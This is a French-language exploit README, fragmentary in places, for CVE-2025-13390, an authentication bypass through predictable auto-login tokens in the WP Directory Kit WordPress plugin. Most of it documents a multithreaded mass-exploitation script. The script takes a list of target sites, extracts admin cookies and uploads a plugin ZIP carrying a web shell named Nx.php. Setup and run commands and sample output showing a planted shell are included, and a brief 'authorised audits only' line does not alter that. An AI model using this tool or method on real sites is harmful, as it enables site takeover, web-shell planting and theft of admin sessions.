
WP Directory Kit <= 1.4.4 - Contournement d'authentification menant à une élévation de privilèges via une prise de contrôle de compte
WP Directory Kit <= 1.4.4 - Contournement d'authentification menant à une escalade de privilèges via un détournement de compte
Le plugin WP Directory Kit pour WordPress est vulnérable à un contournement d'authentification dans toutes les versions jusqu'à la 1.4.4 incluse, en raison d'une implémentation incorrecte de l'algorithme d'authentification dans la fonction
wdk_generate_auto_login_link.Cela est dû à l'utilisation d'un mécanisme de génération de jetons cryptographiquement faible. Cette faille permet à des attaquants non authentifiés d'obtenir un accès administratif et de prendre le contrôle total du site via le point de terminaison d'auto-connexion avec un jeton prévisible.
- CNA : Wordfence
- Score de base : 10.0 CRITIQUE
- Vecteur :
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php).Nx.php).pip install -r requirements.txt
# Ou individuellement :
pip install requests beautifulsoup4 colorama
Nxploited.zip) contenant votre shell nommé Nx.php à la racine.list.txt) avec une URL/hôte par ligne.http(s)://) ou simplement des domaines/IP.http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txtNxploited.zipsuccess_cookies.txt — Sites où des cookies admin réussis ont été extraits.success_shells.txt — URL des shells téléchargés avec succès.uploads_log.txt — Journal complet des tentatives de téléchargement de plugins. _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
Par : Nxploited (Khaled ALenazi)
Telegram : @Nxploited
GitHub : https://github.com/Nxploited
Exploit professionnel de cookies WordPress et téléchargeur de plugin.
Fonctionnalités : Extrait les cookies de connexion, télécharge un plugin (par défaut : Nxploited.zip), attend un shell nommé Nx.php.
Résultats : Shells réussis dans success_shells.txt, cookies réussis dans success_cookies.txt.
Hautement automatisé. Multi-threadé. Pour audits autorisés uniquement.
Fichier de cibles [par défaut : list.txt] :
Threads [par défaut : 8] :
ID utilisateur cible [par défaut : 1] :
Jeton [par défaut : a1b2c3d4e5] :
Chemin du fichier ZIP du plugin [par défaut : Nxploited.zip] :
Nom du dossier du plugin ? [par défaut : Nxploited] :
Rappel : Assurez-vous que votre fichier shell À L'INTÉRIEUR du ZIP du plugin est nommé Nx.php.
42 cibles chargées, 8 threads.
...
[SUCCÈS] http://victim.com : Cookie extrait
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Terminé. URL des shells dans success_shells.txt, cookies dans success_cookies.txt.
8, 16, etc.)1 = admin)/wp-content/plugins/ pour votre charge utile (par défaut tiré du nom du ZIP)